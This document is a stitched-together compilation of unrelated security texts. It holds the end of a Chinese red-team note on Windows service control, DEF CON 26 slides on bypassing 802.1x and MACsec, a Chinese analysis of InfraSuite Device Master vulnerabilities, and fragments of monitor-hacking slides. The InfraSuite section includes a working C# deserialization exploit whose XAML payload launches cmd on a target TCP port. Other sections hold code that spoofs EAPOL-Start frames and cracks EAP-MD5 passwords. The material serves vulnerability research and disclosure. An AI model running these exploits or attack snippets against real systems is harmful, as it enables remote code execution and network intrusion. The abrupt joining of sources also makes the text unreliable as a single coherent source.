The service control programs we use most are sc.exe and services.msc; under the hood they call the same APIs. The SCP mainly talks to the SCM: if you think of the SCM as a server, the SCP is its client. The SCP controls the service process indirectly through the SCM. An SCP is really just a collection of APIs for talking to the SCM. Some of those APIs live in Advapi32.dll, for example CreateService; but Advapi32.dll contains only a small part of them, most of the APIs are in Sechost.dll, and many of the Advapi32.dll APIs are just wrappers around Sechost.dll. So if we want to control a Windows service, besides the interactive way (services.msc) or the command-line way (sc.exe), we can also call the APIs directly and write our own program.
The SCP functions used to manage SCM services are: CreateService, OpenService, StartService, ControlService, QueryServiceStatus, DeleteService. Before using these functions you must open a handle to the SCM with OpenSCManager. Of course, not just anyone can open an SCM handle with OpenSCManager; it requires privileges. At this point, experienced readers will have run into "OpenSCManager error 5", especially when doing psexec-style lateral movement. That error means insufficient privileges: OpenSCManager cannot open a handle to the SCM service, and therefore services cannot be operated on.

3. Service control manager (SCM)
The SCM is the core of Windows services. It communicates directly with service processes and is the real controller of services. The diagram illustrates its communication with service processes well.
The SCM's executable is %SystemRoot%\System32\Services.exe, and the SCM is started during system boot. The detailed SCM startup flow, and the way the SCM controls the startup of other services, are described on pages 446-447 of "Windows Internals, 7th edition", Part 2 (currently available only in English).

0x03 Summary
This series of articles is written half as notes, so it tends to go wherever my thoughts go rather than nailing down every detail. Abuse of Windows services is extremely common in red teaming and touches many techniques, so it is very much worth learning and studying in depth.

Produced by AttackTeamFamily - Author: L.N. - Date: 2022-04-06 - Welcome to www.red-team.cn
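As a rough illustration of the SCP side of this, here is a minimal Python/ctypes sketch (my own example, not from the article) that does the first thing sc.exe does: open a handle to the SCM with OpenSCManager and then open a service through it. The service name "Spooler" and the access masks are just example values; on insufficient privileges the OpenSCManagerW call is exactly where "error 5" would surface.

```python
import ctypes
from ctypes import wintypes

advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)

SC_MANAGER_CONNECT   = 0x0001
SERVICE_QUERY_STATUS = 0x0004

advapi32.OpenSCManagerW.restype  = wintypes.HANDLE
advapi32.OpenSCManagerW.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, wintypes.DWORD]
advapi32.OpenServiceW.restype    = wintypes.HANDLE
advapi32.OpenServiceW.argtypes   = [wintypes.HANDLE, wintypes.LPCWSTR, wintypes.DWORD]
advapi32.CloseServiceHandle.argtypes = [wintypes.HANDLE]

# Step 1: open a handle to the SCM (fails with error 5 if the caller lacks rights).
scm = advapi32.OpenSCManagerW(None, None, SC_MANAGER_CONNECT)
if not scm:
    raise ctypes.WinError(ctypes.get_last_error())

# Step 2: open a specific service through the SCM.
svc = advapi32.OpenServiceW(scm, "Spooler", SERVICE_QUERY_STATUS)
if not svc:
    raise ctypes.WinError(ctypes.get_last_error())

print("Got SCM and service handles; a real SCP would now call Start/Control/QueryServiceStatus.")
advapi32.CloseServiceHandle(svc)
advapi32.CloseServiceHandle(scm)
```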
pdf
Owning the LAN in 2018 Defeating MACsec and 802.1x-2010 DEF CON 26 Gabriel “solstice” Ryan Disclaimers & Updates These slides are an early version designed for pre-release prior to DEF CON 26. All content will be updated by the time of the presentation at DEF CON 26 in August. Final versions of all content will be available at: § https://www.digitalsilence.com/blog/ About: Digital Silence Denver-based security consulting firm: § Penetration testers who give a !@#$ § Red teaming § Penetration Testing § Reverse-engineering / advanced appsec / research Twitter (for those of you who are into that sort of thing): @digitalsilence_ About: Gabriel Ryan (a.k.a. solstice) Co-Founder / Senior Security Assessment Manager @ Digital Silence § Former Gotham Digital Silence, former OGSystems § Red teamer / Researcher / New Dad Twitter: @s0lst1c3 LinkedIn: ms08067 Email: gabriel@digitalsilence.com Introduction to 802.1x The 802.1x authentication protocol: § Authentication protocol § Used to protect a local area network (LAN) or wireless local area network (WLAN) with rudimentary authentication What is 802.1x? § Authentication protocol § Used to protect a local area network (LAN) or wireless local area network (WLAN) with rudimentary authentication 802.1.x defines an exchange between three parties: § supplicant – the client device that wishes to connect to the LAN [1][2][9] § authenticator – a network device such as a switch that provides access to the LAN [1][2][9] § authentication server – a host that runs software that implements RADIUS or some other Authorization, Authentication, and Accounting (AAA) protocol [1][2][9] § authenticator can be thought of as a gatekeeper § supplicant connects to a switch port and provides the authenticator with its credentials [1][2][9] § authenticator forwards credentials to the authentication server [1][2][9] § Authentication server validates the credentials, and either allows or denies access the network [1][2][9] 802.1x is (typically) a four step sequence: 1. Initialization 2. Initiation 3. EAP Negotiation 4. Authentication [1][2][9] Ports have two states: § Authorized – traffic is unrestricted § Unauthorized – traffic is restricted to 802.1x [1][2][9] Step 1: Initialization 1. Supplicant connects to switch port, which is disabled 2. Authenticator detects new connection, enables switch port in unauthorized state [1][2][9] Step 2: Initiation 1. (optional) Supplicant sends EAPOL-Start frame [1][2][9] 2. Authenticator responds with EAP-Request-Identity frame [1][2][9] 3. Supplicant sends EAP-Response-Identity frame (contains an identifier such as a username) [1][2][9] 4. Authenticator encapsulates EAP-Response-Identity in a RADIUS Access-Request frame and forwards it to Authentication Server [1][2][9] Step 3: EAP Negotiation Long story short: supplicant and authentication server haggle until they decide on an EAP method that they’re both comfortable with. [1][2][9] Step 4: Authentication § Specific details of how authentication should work are dependent on the EAP method chosen by the authentication server and supplicant [1][2][9] § Always will result in a EAP-Success or EAP-Failure message [1][2][9] § Port is set to authorized state if EAP-Success, otherwise remains unauthorized [1][2][9] What is EAP? 
Extensible Authentication Protocol (EAP): It's an authentication framework: § Not really a protocol, only defines message formats § Individual EAP implementations are called "EAP methods" § Think of it as a black box for performing authentication Notable EAP methods… EAP-MD5 EAP-MD5: Security Issues Entire process occurs over plaintext (bad bad bad bad bad) Brad Antoniewicz and Josh Wright in 2008: [13] § attacker can capture MD5-Challenge-Request and MD5-Challenge-Response by passively sniffing traffic [13] § Dictionary attack can be used to obtain a password using captured data [13] EAP-MD5: Security Issues Fanbao Liu and Tao Xie in 2012: [19] § EAP-MD5 credentials can be recovered even more efficiently using length-recovery attack [19] EAP-PEAP EAP-PEAP: Security Issues Remember – EAP also used for wireless authentication. Brad Antoniewicz and Josh Wright in 2008: [13] § attacker can use a rogue access point attack to force the supplicant to authenticate with a rogue authentication server [13][20] § So long as the supplicant accepts the certificate presented by the attacker's authentication server, the supplicant will transmit an EAP challenge and response to the attacker [13][21] § can be cracked to obtain a plaintext username and password [13][21] EAP-PEAP: Security Issues MS-CHAPv2 is the strongest Inner Authentication protocol available for use with EAP-PEAP and EAP-TTLS: § vulnerable to a cryptographic weakness discovered by Moxie Marlinspike and David Hulton in 2012 [22] § MS-CHAPv2 challenge and response can be reduced to a single 56-bits of DES encryption [22][23] § The 56-bits can be converted into a password-equivalent NT hash within 24 hours with a 100% success rate using FPGA-based hardware [22][23] EAP-TLS EAP-TLS EAP-TLS was introduced by RFC 5216 in response to weaknesses in EAP methods such as EAP-PEAP and EAP-TTLS: § strength lies in use of mutual certificate-based authentication during the outer authentication process [24] § prevents the kinds of MITM attacks that affect weaker EAP methods [24] § Poor adoption rate [25] Brief History of Wired Port Security Brief History of Wired Port Security 2001 – the 802.1x-2001 standard is created to provide rudimentary authentication for LANs [1] 2004 – the 802.1x-2004 standard is created as an extension of 802.1x-2001 to facilitate the use of 802.1x in WLANs [2] Brief History of Wired Port Security 2005 – Steve Riley demonstrates that 802.1x-2004 can be bypassed by inserting a hub between supplicant and authenticator [3] § Interaction limited to injecting UDP packets (TCP race condition) [4] Brief History of Wired Port Security 2011 – "Abb" of Gremwell Security creates Marvin: [5] § Bypasses 802.1x by introducing rogue device directly between supplicant and switch [5] § No hub necessary: rogue device configured as a bridge [5] § Full interaction with network using packet injection [5] Brief History of Wired Port Security 2011 – Alva Duckwall's 802.1x-2004 bypass: [4]: § Transparent bridge used to introduce rogue device between supplicant and switch [4] § No packet injection necessary: network interaction granted by using iptables to source NAT (SNAT) traffic originating from device [4] § More on this attack later... 
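To make the EAP-MD5 weakness described above concrete, here is a minimal sketch (mine, not from the slides) of the offline dictionary attack against a sniffed MD5-Challenge/Response pair. EAP-MD5 computes the response the same way CHAP does, MD5(Identifier || password || Challenge); all of the values below are made-up placeholders standing in for data captured off the wire.

```python
import hashlib

def eap_md5_response(identifier: int, password: bytes, challenge: bytes) -> bytes:
    # EAP-MD5 reuses the CHAP (RFC 1994) computation:
    # MD5(Identifier byte || password || Challenge)
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()

# Example values standing in for what would be sniffed from the wired exchange.
identifier = 0x02
challenge  = bytes.fromhex("00112233445566778899aabbccddeeff")
captured   = eap_md5_response(identifier, b"printer123", challenge)  # normally taken from the capture

# Offline dictionary attack against the captured challenge/response pair.
for word in ["password", "letmein", "printer123"]:
    if eap_md5_response(identifier, word.encode(), challenge) == captured:
        print("recovered password:", word)
        break
```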
Brief History of Wired Port Security 2017 – Valérian Legrand creates Fenrir: [6]: § Works similarly to Duckwall’s tool, but implements NATing in Python using Scapy (instead of making calls to iptables / arptables / ebtables) [6] § Modular design, support for responder, etc… MAC Filtering and MAC Authentication Bypass (MAB) Fun fact: not all devices support 802.1x…. Not all devices support 802.1x: § Enterprise organizations with 802.1x protected networks need to deploy them anyways § Solution: disable 802.1x on the port used by the device – this is known as a port security exception § 802.1x usually replaced with MAC filtering or some other weak form of access control Port security exceptions: § Historically, very prevalent due to widespread lack of 802.1x support by peripheral devices (printers, IP cameras, etc) § Low hanging fruit for attackers – much easier than trying to actually bypass 802.1x using a bridge or hub Demo: MAB Current State of Wired Port Security Relatively new technology: 802.1x-2010 Uses MACsec to provide: § hop-by-hop Layer 2 encryption [3][4][6][7] § Packet-by-packet integrity check [3][4][6][7] Mitigates bridge-based attacks that affect 802.1x-2004 [7] 802.1x-2010: Vendor Support Largest manufacturers of enterprise networking hardware now support 802.1x-2010 and MACsec: § Limited to high end equipment § Full support for all 802.1x-2010 features varies by make and model 802.1x-2010: Adoption Rates Loaded question, since adoption rates for 802.1x itself remain low. With that said: § MACsec and 802.1x-2010 are just beginning to take off § adoption rate steadily increasing Improvements in Peripheral Device Security Most printer manufacturers offer at least one affordable model that supports 802.1x: § Legacy hardware phased out, replaced with 802.1x capable models § Port security exceptions becoming less prevalent (many sad red teamers) Improvements in Peripheral Device Security Goal of this project: tip the scales back in favor of attackers § explore ways in which 802.1x-2010 and MACsec can be bypassed § Address the reduced prevalence of port security exceptions by identifying alternative methods for attacking peripheral devices Improvements to Bridge-Based Bypass Techniques Classical Bridge-based 802.1x Bypass § Developed by Alva Duckwall in 2014 [4] § Uses transparent bridge to silently introduce rogue device between supplicant and authenticator [4] § Network interaction achieved by using iptables to source NAT (SNAT) traffic originating from device [4] § Hidden SSH service created on rogue device by forwarding traffic to the supplicant’s IP address on a specified port to bridge’s IP address on port 22 [4] Improvement: Leveraging Native EAPOL Forwarding Linux kernel will not forward EAPOL packets over a bridge. 
Existing tools deal with this problem by either: § patching the Linux kernel § Relying on high level libraries such as Scapy Improvement: Leveraging Native EAPOL Forwarding Problems with both of these approaches: § Relying on Kernel patches can become unwieldy: no publicly available Kernel patches for modern kernel versions § Relying on high level tools such as Scapy can make the bridge slow under heavy loads [17][18] Improvement: Leveraging Native EAPOL Forwarding Fortunately, the situation has dramatically improved since Duckwall’s contribution: § as of 2012, EAPOL bridging can be enabled using the proc file system [11] § that means no more patching :D [11] Improvement: Bypassing Sticky MAC Most modern authenticators use some form of Sticky MAC: § dynamically associates the MAC address of the supplicant to the switch port once the supplicant has successfully authenticated [28][29] § if another MAC address is detected on the switch port, a port security violation occurs and the port is blocked [28][29] Improvement: Bypassing Sticky MAC Our updated implementation: § sets the bridge and PHY interfaces to the MAC address of the authenticator § sets the upstream interface to the MAC address of the supplicant Improvement: Support for Side Channel Interaction In Duckwall’s original bypass, outbound ARP and IP traffic is initially blocked while the transparent bridge is initialized [4]: § Prevents us from using a side channel device, such as an LTE modem Improvement: Bypassing Sticky MAC Our updated implementation: § added a firewall exception that allows outbound traffic from our side channel interface only § allows the user to specify a desired egress destination port Demo: Improvements to Bridge-Based Bypass Techniques Introduction to MACsec and 802.1x-2010 Introduction to 802.1x-2010 and MACsec All traditional 802.1x bypasses (hub, injection, or bridge based) take advantage of the same fundamental security issues that affect 802.1x-2004: [3][4][6][7] § The protocol does not provide encryption § The protocol does not support authentication on a packet- by-packet basis Introduction to 802.1x-2010 and MACsec These security issues are addressed in 802.1x- 2010, which uses MACsec to provide: [7] § Layer 2 encryption performed on a hop-by-hop basis § Packet-by-packet integrity checks Introduction to 802.1x-2010 and MACsec Support for hop-by-hop encryption particularly important: [7] § Protects against bridge-based attacks § Allows network administrators with a means to inspect data in transit Introduction to 802.1x-2010 and MACsec The 802.1x-2010 protocol works in three stages: [7][8][9] 1. Authentication and Master Key Distribution 2. Session Key Agreement 3. Session Secure Things to think about… “IEEE Std 802.11 specifies media-dependent cryptographic methods to protect data transmitted using the 802.11 MAC over wireless networks. 
Conceptually these cryptographic methods can be considered as playing the same role within systems and interface stacks as a MAC Security Entity.” – IEEE 802.1x-2010 Standard – Section 6.6 [9] Parallels between MACsec and WPA 2003 – WPA1 is released Hop-by-hop Layer 2 Encryption: § access point to station Authentication provided by: § Extensible Authentication Protocol (EAP) § Pre-Shared Key (as a fallback / alternative) Shift of focus due to WPA Injection-based Attacks no longer possible due to Layer 2 encryption Focus shifts to attacking authentication mechanism § Pre-Shared Key (PSK) – WPA Handshake Capture and Dictionary Attack § EAP – Rogue AP attacks against weak EAP methods 2010 – 802.1x-2010 is released Hop-by-hop Layer 2 Encryption using MACsec: § device to switch / switch to switch Authentication provided by: § Extensible Authentication Protocol (EAP) § Pre-Shared Key (as a fallback / alternative) Shift of focus due to MACsec Bridge and injection-based attacks no longer possible due to Layer 2 encryption Focus shifts to attacking authentication mechanism § Pre-Shared Key (PSK) – some kind of dictionary attack??? (still working on that) § EAP – attacks against weak EAP methods (main takeaway of this talk) Defeating MACsec Using Rogue Gateway Attacks Defeating MACsec Using Rogue Gateway Attacks Most important takeaway about 802.1x-2010 (from an attacker’s perspective): [7] § It still uses EAP to authenticate devices to the network § EAP is only as secure as the EAP method used Supported EAP methods: The 802.1x-2010 standard allows any EAP method so long as it: [7] § Supports mutual authentication § Supports derivation of keys that are at least 128 bits in length § Generates an MSK of at least 64 octets Plenty of commonly seen weak EAP methods that meet these requirements (EAP-PEAP, EAP-TTLS, etc). I THINK YOU SEE WHERE THIS IS GOING Our lab environment: Option 1: MITM style bypass Option 2: Direct Access Let’s build a rogue device… Step 1: Device Core Step 2: Mechanically Assisted Bypass FRONT BACK Step 2: Mechanically Assisted Bypass Need a way of manipulating the push switch: § Using relays will lead to impedance issues unless you’re an electrical engineer (which I am certainly not…) § Option B: use solenoids Step 2: Mechanically Assisted Bypass Push Solenoid Pull Solenoid Step 2: Mechanically Assisted Bypass Step 2: Mechanically Assisted Bypass Step 3: Establish a Side Channel Step 4: Plant the Device Step 5: Rogue Gateway Attack Step 6: Bait n Switch Demo: Defeating MACsec Using Rogue Gateway Attacks Dealing With Improvements to Peripheral Device Security Improvements to Peripheral Device Security Improved 802.1x support by peripheral devices: § bypassing port security by looking for policy exceptions has become difficult Improvements to Peripheral Device Security Important caveat: § Improved adoption of 802.1x does not necessarily imply strong port security for peripheral devices § Back to EAP: most EAP methods have major security issues Improvements to Peripheral Device Security Adoption rates for secure EAP methods very poor across all device types: § Secure EAP methods are often challenging to deploy at scale We can expect these adoption rates to be even lower for peripheral devices: § Already painful to configure § Not always centrally manageable through Group Policy (besides, is a domain joined printer really a good idea?) 
Improvements to Peripheral Device Security What this means: § Peripheral devices are still a viable attack vector for bypassing port security EAP-MD5 Forced Reauthentication Attack EAP-MD5 Forced Reauthentication Attack EAP-MD5 is widely used to protect peripheral devices such as printers: § Easy to setup and configure § Still better than MAC filtering EAP-MD5 Forced Reauthentication Attack Leveraging what we know about how to attack EAP-MD5 and 802.1x-2004: 1. Use bridge-based approach to place rogue device between supplicant and authenticator 2. Wait for the supplicant to authenticate, and sniff the EAP-MD5- Challenge and EAP-MD5-Response when it does [13] 3. Crack credentials, connect to network using Bait n’ Switch EAP-MD5 Forced Reauthentication Attack One major drawback to this approach: § We must wait for the supplicant to reauthenticate with the switch Realistically, this will not happen unless supplicant is unplugged § disabling a virtual network interface is not enough § Using mechanical splitters is an option, but the less overhead the better EAP-MD5 Forced Reauthentication Attack First two steps of the EAP authentication process: [1][2][9] 1. (optional) supplicant sends the authenticator an EAPOL-Start frame 2. The authenticator sends the supplicant an EAP-Request-Identity frame Problem: supplicant has no way of verifying if incoming EAP- Request-Identity frame has been sent in response to an EAPOL-Start. EAP-MD5 Forced Reauthentication Attack What this means: we can force reauthentication by sending an EAPOL-Start frame to the authenticator as if it came from the supplicant (MAC spoofing): § Result: authenticator will send EAP-Request-Identity frame to the actual supplicant, kickstarting the reauthentication process § Both the authenticator and supplicant believe that the other party has initiated the reauthentication attempt Demo: Forced Reauthentication EAP-MD5 Forced Reauthentication Attack EAP-MD5 Forced Reauthentication Attack: 1. Introduce rogue device into the network between authenticator and supplicant 2. Start transparent bridge and passively sniff traffic 3. Force reauthentication by sending spoofed EAPOL-Start frame to the authenticator 4. 
Captured and crack EAP-MD5-Challenge and EAP-MD5- Response Demo: EAP-MD5 Forced Reauthentication Attack EAP-MD5 Forced Reauthentication Attack Proposed Mitigation – safety-bit in the EAP-Request-Identity frame: § set to 1 when the frame was sent in response to an EAPOL-Start frame § Checked when supplicant receives an EAP-Request-Identity frame § Authentication process aborted if safety bit set to 1 and supplicant did not recently issue EAPOL-Start frame Leveraging Rogue Gateway Attacks Against Peripheral Devices Rogue Gateway Attacks Against Peripheral Devices Other commonly used weak EAP methods used by peripheral devices include EAP-TTLS and EAP-PEAP: [13] § Attacks are considerably more involved compared to EAP-MD5 § Authentication occurs through an encrypted tunnel, so a MITM is necessary to capture the challenge and response [13] Rogue Gateway Attacks Against Peripheral Devices Solution – use Rogue Gateway Attack: § No mechanical splitters needed this time: attack can be implemented in software using transparent bridge Step 1: Plant the Device Step 2: Perform the Attack Closing Thoughts Closing Thoughts Our contributions: § Rogue Gateway and Bait n Switch – Bypass 802.1x-2011 by attacking its authentication mechanism § Updated & improved existing 802.1x-2004 bypass techniques § EAP-MD5 Forced Reauthentication attack – improved attack against EAP-MD5 on wired networks Closing Thoughts Key takeaways (1 of 2): § Port security is still a positive thing (keep using it!) § Port security is not a substitute for a layered approach to network security (i.e. deploying 802.1x does not absolve you from patch management responsibilities) Closing Thoughts Key takeaways (2 of 2): § Benefits provided by 802.1x can be undermined due to continued use of EAP as authentication mechanism § Improved 802.1x support by peripheral device manufacturers largely undermined by lack of support for 802.1x-2010 and low adoptions / support rates for strong EAP methods Blog post & whitepaper: https://www.digitalsilence.com/blog/ Tool: github.com/s0lst1c3/silentbridge References: [1] http://www.ieee802.org/1/pages/802.1x-2001.html [2] http://www.ieee802.org/1/pages/802.1x-2004.html [3] https://blogs.technet.microsoft.com/steriley/2005/08/11/august-article-802-1x-on-wired-networks-considered-harmful/ [4] https://www.defcon.org/images/defcon-19/dc-19-presentations/Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf [5] https://www.gremwell.com/marvin-mitm-tapping-dot1x-links References: [6]https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf [7] https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-networking-services/deploy_guide_c17-663760.html [8] https://1.ieee802.org/security/802-1ae/ [9] https://standards.ieee.org/findstds/standard/802.1X-2010.html [10] http://www.ieee802.org/1/files/public/docs2013/ae-seaman-macsec-hops-0213-v02.pdf References: [11] https://www.gremwell.com/linux_kernel_can_forward_802_1x [12] https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html [13]http://www.willhackforsushi.com/presentations/PEAP_Shmoocon2008_Wright_Antoniewicz.pdf [14] https://link.springer.com/content/pdf/10.1007%2F978-3-642-30955-7_6.pdf [15] https://support.microsoft.com/en-us/help/922574/the-microsoft-extensible-authentication-protocol-message-digest-5-eap References: [16] https://tools.ietf.org/html/rfc3748 [17] 
https://code.google.com/archive/p/8021xbridge/source/default/commits [18] https://github.com/mubix/8021xbridge [19] https://hal.inria.fr/hal-01534313/document [20] https://sensepost.com/blog/2015/improvements-in-rogue-ap-attacks-mana-1%2F2/ References: [21] https://tools.ietf.org/html/rfc4017 [22] http://web.archive.org/web/20160203043946/https:/www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/ [23] https://crack.sh/ [24] https://tools.ietf.org/html/rfc5216 [25] https://4310b1a9-a-93739578-s-sites.googlegroups.com/a/riosec.com/home/articles/Open-Secure-Wireless/Open-Secure- Wireless.pdf?attachauth=ANoY7cqwzbsU93t3gE88UC_qqtG7cVvms7FRutz0KwK1oiBcEJMlQuUmpGSMMD7oZGyGmt4M2HaBhHFb07j8Gvmb_H WIE8rSfLKDvB0AI80u0cYwSNi5ugTP1JtFXsy1yZn8-85icVc32PpzxLJwRinf2UGzNbEdO97Wsc9xcjnc8A8MaFkPbUV5kwsMYHaxMiWwTcE- A8Dp49vv-tmk86pNMaeUeumBw_5vCZ6C3Pvc07hVbyTOsjqo6C6WpfVhd_M0BNW0RQtI&attredirects=0 References: [26] https://txlab.wordpress.com/2012/01/25/call-home-ssh-scripts/ [27] https://txlab.wordpress.com/2012/03/14/improved-call-home-ssh-scripts/ [28] https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3560/software/release/12-2_37_se/command/reference/cr1/cli3.html#wp1948361 [29] https://www.juniper.net/documentation/en_US/junos/topics/concept/port-security-persistent-mac-learning.html [30] https://tools.ietf.org/html/rfc3579 References: [31] https://tools.ietf.org/html/rfc5281
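As a technical footnote to the EAP-MD5 forced reauthentication attack described earlier: a spoofed EAPOL-Start is a single, well-formed frame, so a minimal Scapy sketch (mine, not the silentbridge implementation) is enough to show the idea. The supplicant MAC address and interface name are placeholder values learned by sniffing on the transparent bridge.

```python
from scapy.all import Ether, EAPOL, sendp

supplicant_mac = "00:11:22:33:44:55"     # placeholder: MAC of the legitimate supplicant
PAE_GROUP_ADDR = "01:80:c2:00:00:03"     # 802.1X PAE group address

# EAPOL type 1 == EAPOL-Start; spoofing the source MAC makes the authenticator
# believe the supplicant itself asked to (re)authenticate.
frame = Ether(src=supplicant_mac, dst=PAE_GROUP_ADDR) / EAPOL(version=2, type=1)
sendp(frame, iface="eth0", verbose=False)  # interface facing the authenticator
```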
pdf
对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 1 / 15 author: Y4er 前⾔ 看到zdi发了⼀堆洞,有反序列化、⽬录穿越、权限绕过等等,还是dotnet的,于是有了此⽂。 基础架构 exe对应端⼝ C:\Program Files\InfraSuite Device Master\Device-DataCollect\Device-DataCollect.exe 3000 C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 3100 3110 C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 80 443 CVE-2022-41778 https://www.zerodayinitiative.com/advisories/ZDI-22-1478/ 这个漏洞在3100和3110端⼝ 从TCP服务器到业务处理的逻辑如下 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 2 / 15 StartGatewayOperation中设置了⽹关服务的⼀些配置 初始化TCP端⼝ 监听IPv4 v6,端⼝DEFAULT_TCP_PORT 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 3 / 15 this.InitialWebEngine()中配置了web服务器 在StartControlLayer中起worker线程跑业务逻辑 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 4 / 15 也就是MainLoop 在DoUpperLayerNWPacket中根据PacketData的sHeader字段的i32PayloadType进⾏switch case。 随便进⼊⼀个case 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 5 / 15 看到 Serialization.DeSerializeBinary(sPacket.payload, out obj) 直接binaryformatter,没啥好说的。关键点在于怎么构造payload。 构造payload 构造需要研究其tcp的处理逻辑,在ControlLayerMngt的构造函数中 初始化了⼀个TCPServerConnectionMngt,在ModuleInitialization中定义了TCP链接的send和receive事件。 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 6 / 15 我们发送给server的请求是receive事件,被ReceiveCallBack处理。 分别进⾏add、check操作 在add中将传⼊的buffer赋予⾃身this._gRxPacketBytesBuffer,变⻓存储字节数据。 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 7 / 15 check中检查数据包格式,重组PacketData对象 并调⽤this.AddRxPacket(packetData)将重组的packet对象加⼊this._gRxPacketList 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 8 / 15 回看MainLoop this.CheckUpperLayerNWPacket(); this.DoUpperLayerNWPacket(); Check调⽤ReceivePacket判断this._gRxPacketList中是否有数据包 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 9 / 15 ReceivePacket调⽤GetFirstRxPacket拿到第⼀个数据包packet 然后调⽤this._gUpperLayerNWPacketQueue.AddToSyncQueue(packetData)将数据包加⼊到同步队列中。 DoUpperLayerNWPacket就是拿到队列中的第⼀个数据包 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 10 / 15 到这⾥的话就随便进⼊⼀个case,拿CtrlLayerNWCmd_FileOperation举例 将PacketData的payload字段反序列化回来,转为CtrlLayerNWCommand_FileOperation业务对象从⽽进⾏下 ⼀步业务处理。 那么到此,我们基本明⽩了其架构。 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 11 / 15 那么写EXP完全照搬就⾏了。 using InfraSuiteManager.Common; using System; using System.IO; using System.Runtime.Serialization; using Microsoft.VisualStudio.Text.Formatting; using System.Net.Sockets; namespace ConsoleApp1 { internal class Program { [Serializable] public class TextFormattingRunPropertiesMarshal : ISerializable { protected TextFormattingRunPropertiesMarshal(SerializationInfo info, StreamingContext context) { } string _xaml; public void GetObjectData(SerializationInfo info, StreamingContext context) { Type typeTFRP = typeof(TextFormattingRunProperties); info.SetType(typeTFRP); info.AddValue("ForegroundBrush", _xaml); } public TextFormattingRunPropertiesMarshal(string xaml) { _xaml = xaml; } } static void Main(string[] args) { string xaml_payload = File.ReadAllText(@"1.txt"); 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 12 / 15 TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload); PacketData packet = new PacketData(); PacketOperation packetOperation = new PacketOperation(); if (!Serialization.SerializeBinary(payload, out packet.payload)) { Console.WriteLine("serialize error."); } packet.sHeader.i32PayloadSize = packet.payload.Length; byte[] byTxPacket; packetOperation.MakePacketBytes(packet, out byTxPacket); TcpClient tcpClient = new TcpClient("172.16.9.136", 3000); 
NetworkStream stream = tcpClient.GetStream(); var b = new BinaryWriter(stream); b.Write(byTxPacket); stream.Close(); tcpClient.Close(); Console.WriteLine("done."); Console.ReadKey(); } } } <?xml version="1.0" encoding="utf-16"?> <ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"> <ObjectDataProvider.ObjectInstance> <sd:Process> <sd:Process.StartInfo> <sd:ProcessStartInfo Arguments="/c notepad" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" /> </sd:Process.StartInfo> </sd:Process> </ObjectDataProvider.ObjectInstance> </ObjectDataProvider> 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 13 / 15 对于Device-DataCollect 根据packetData.sHeader.i32PayloadType可以case到1 InfraSuiteManager.DataCollectionLayer.DataCollectionLayerMngt.DCLNWCmd_DCServerS tatus(ref PacketData) 这个地⽅有反序列化 构造payload不写了,Device-DataCollect和Device-Gateway架构差不多。同样⽤PacketOperation构造 packet数据包就⾏了。 其他的洞就是case不⼀样,以下就只写漏洞点所在了。 CVE-2022-41657 InfraSuiteManager.ControlLayer.ControlLayerMngt.CtrlLayerNWCmd_FileOperation(ref PacketData) 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 14 / 15 fileName参数可控导致跨⽬录任意⽂件写⼊+任意⽂件删除 fileName参数导致任意⽂件读取 CVE-2022-41772 没看出来,感觉是解压⽬录穿越 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 15 / 15 CVE-2022-41688 CVE-2022-40202 总结 很经典的dotnet tcp server的漏洞,尤其是server对于tcp packet的处理和业务逻辑的关联梳理,让我对 dotnet的理解更进⼀步。
pdf
A Monitor Darkly (DEF CON 24)
Ang Cui, PhD | Jatin Kataria
https://github.com/RedBalloonShenanigans/MonitorDarkly

[Slide deck; most slides are images. Text recoverable from the slides:]
DDC: http://caxapa.ru/thumbs/349020/ddcciv1.pdf
Answered Question 1 & 2
Transfers the image
Box with: Color 0, Color 1, Color 2, Color 3
Doc mentions 8-bit CLU
Samsung SE310, Dell 2417U, HP 23xw, Acer G246HL
SE1279RL-MST, MST9122H1, TSUMOL88CDC5-1, TSUML58YHC2-1
http://boeglin.org/blog/index.php?entry=Flashing-a-BenQ-Z-series-for-free(dom) (Alexandre Boeglin)
https://github.com/RedBalloonShenanigans/MonitorDarkly
DELL does not yet have a security fix against SHAK ATTACK
MANY MONITORS WERE HARMED IN THE MAKING OF THIS PRESENTATION
Chris lives happily with his semi-unmodified 34" monitor
